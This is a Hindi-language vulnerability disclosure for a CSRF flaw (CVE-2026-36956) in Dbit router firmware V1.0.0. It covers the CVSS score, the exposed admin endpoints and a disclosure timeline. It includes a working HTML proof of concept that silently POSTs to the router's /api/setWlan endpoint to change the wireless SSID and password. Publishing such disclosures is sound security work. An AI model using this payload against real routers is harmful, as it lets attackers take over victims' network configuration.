
CVE-2026-36956 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, Dbit राउटर फर्मवेयर में एक CSRF भेद्यता जो जाली अनुरोधों के माध्यम से अनधिकृत कॉन्फ़िगरेशन परिवर्तनों की अनुमति देती है।
CVE ID: CVE-2026-36956 दिनांक: 2026-04-29 खोजकर्ता: Kirubel Solomne विक्रेता: Shenzhen Dibit Network Equipment Co., Ltd. उत्पाद: Dbit Router फर्मवेयर संस्करण: V1.0.0 CWE: CWE-352 - क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF)
Dbit Router फर्मवेयर V1.0.0 प्रशासनिक API एंडपॉइंट्स पर एंटी-CSRF टोकन या सख्त Origin/Referer सत्यापन जैसे CSRF सुरक्षा तंत्र लागू नहीं करता है। एक हमलावर एक दुर्भावनापूर्ण वेबपेज तैयार कर सकता है जो कॉन्फ़िगरेशन एंडपॉइंट्स पर नकली HTTP अनुरोध भेजता है। यदि कोई प्रमाणित व्यवस्थापक दुर्भावनापूर्ण पेज पर जाता है, तो राउटर नकली अनुरोध को एक वैध प्रशासनिक क्रिया के रूप में संसाधित करता है।
CVSS v3.1 स्कोर: 8.8 (उच्च)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
| मीट्रिक | मान |
|---|
| अटैक वेक्टर | नेटवर्क |
| अटैक जटिलता | निम्न |
| आवश्यक विशेषाधिकार | कोई नहीं |
| उपयोगकर्ता इंटरैक्शन | आवश्यक |
| गोपनीयता प्रभाव | उच्च |
| अखंडता प्रभाव | उच्च |
| उपलब्धता प्रभाव | उच्च |
| एंडपॉइंट | कार्य |
|---|---|
/api/setWlan | वायरलेस नेटवर्क कॉन्फ़िगरेशन (SSID, पासवर्ड) |
/api/setWan | WAN कॉन्फ़िगरेशन |
/api/setSystem | सिस्टम कॉन्फ़िगरेशन |
निम्नलिखित को poc.html के रूप में सहेजें और इसे तब खोलें जब कोई व्यवस्थापक राउटर में लॉग इन हो:
<!DOCTYPE html>
<html>
<body>
<script>
fetch('http://192.168.10.1/api/setWlan', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
ssid: "Hacked_Network",
password: "attacker123"
})
});
</script>
</body>
</html>
अपेक्षित व्यवहार: CSRF टोकन बेमेल के कारण अनुरोध को अस्वीकार कर दिया जाना चाहिए। वास्तविक व्यवहार: राउटर नकली अनुरोध को स्वीकार करता है और संसाधित करता है।
| दिनांक | घटना |
|---|---|
| 2026-04-29 | भेद्यता की खोज की गई |
| 2026-04-29 | MITRE को रिपोर्ट किया गया |
| 2026-04-29 | CVE-2026-36956 निर्धारित किया गया |
| 2026-04-29 | सार्वजनिक प्रकटीकरण |